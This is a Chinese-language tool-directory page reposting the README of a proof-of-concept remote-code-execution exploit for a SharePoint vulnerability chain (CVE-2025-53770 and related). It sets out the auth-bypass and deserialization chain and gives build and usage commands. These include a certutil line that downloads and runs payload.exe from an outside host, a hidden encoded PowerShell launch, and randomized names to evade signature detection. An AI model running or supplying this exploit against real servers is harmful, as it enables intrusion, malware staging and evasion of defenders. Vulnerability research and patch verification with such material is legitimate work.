Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OurSharePoint-CVE-2025-53770 — 你真的认为 SharePoint 安全吗? | Kitploit
工具/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubrabbitbong/oursharepoint-cve-2025-53770

OurSharePoint-CVE-2025-53770

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

你真的认为 SharePoint 安全吗?

查看仓库
2116个月前尚未审核

OurSharePoint — CVE-2025-53770 PoC

独立自包含的单二进制 SharePoint RCE 工具。生成 TypeConfuseDelegate 利用链作为原始 MS-NRBF 字节(无需 ysoserial.exe),将其包装在 DataSet 反序列化载荷中,并通过 HTTP 利用身份验证绕过进行传递——全部一次性完成。


利用链

步骤CVE描述
1CVE-2025-49706身份验证绕过 — Referer: /_layouts/SignOut.aspx 跳过 SharePoint 身份验证
2CVE-2025-53771补丁绕过 — ToolPane.aspx 后的尾部路径段规避 2025 年 7 月修复
3CVE-2025-49704反序列化 — ExcelDataSet.CompressedDataTable 在构造的 DataSet 上触发 BinaryFormatter
4—DataSet 模式强制通过 ExpandedWrapper + ObjectDataProvider 对内部载荷执行 LosFormatter.Deserialize()
5—TypeConfuseDelegate — SortedSet<string> 的比较器是 Process.Start(string, string),执行 cmd /c <command>

整个二进制流(包括外层的 DataSet 包装器和内部的 TypeConfuseDelegate 利用链)均作为原始 MS-NRBF 记录构建——未使用 .NET 运行时序列化。这与 Metasploit 模块生成的格式逐字节匹配。


构建

需要 .NET Framework 4.8 SDK(Visual Studio 2022 或独立 Build Tools):

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

输出:OurSharePoint\bin\Release\OurSharePoint.exe(单个文件,无依赖)


用法

一次性:分段加载并执行

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

简单命令执行

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

PowerShell 静默加载

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

仅侦察(无载荷)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

离线构建载荷文件

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

通过代理(Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

传统方式:外部 ysoserial.exe 载荷

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

选项


输出文件

当使用 --out 时,工具会写入以下文件:

文件内容
<prefix>.bin原始 BinaryFormatter DataSet 流
<prefix>.b64GZip + Base64 编码(即放入 CompressedDataTable 的内容)

受影响版本

版本受影响范围
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

实现说明

  • 无运行时序列化 — DataSet 包装器和 TypeConfuseDelegate 利用链均使用 BinaryWriter 作为原始 MS-NRBF 二进制记录写入。这避免了 .NET 运行时序列化输出与目标反序列化器预期之间的差异。
  • LosFormatter 框架 — 内部利用链使用 ObjectStateFormatter 头字节(0xFF 0x01 0x32 + 7 位长度)进行包装,而非使用 LosFormatter.Serialize()。
  • 单个二进制文件 — 无需外部工具、DLL 或 Python 脚本。.exe 完全独立自包含。
  • 随机化 — XML 标签前缀和 DataSet 元素名称在每次执行时随机化,以避免签名检测。

参考

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF 规范
  • pwntester/ysoserial.net — TypeConfuseDelegate
下载工具
标志描述默认值
--cmd=COMMAND要执行的命令(以 cmd /c COMMAND 运行)—
--in=FILE预构建的 base64 LosFormatter 载荷文件—
--target=URL用于 HTTP 传递的 SharePoint 基础 URL—
--check仅指纹识别版本,不发送载荷—
--out=PREFIX输出文件前缀payload
--sp-version=VERLayouts 路径版本(15 或 16)15
--proxy=URLHTTP 代理—
--ua=STRING自定义 User-AgentFirefox 120
--referer=URL覆盖认证绕过 Refererauto
--timeout=SECHTTP 超时15
--a/b/c=NAMEDataSet/元素/列名称随机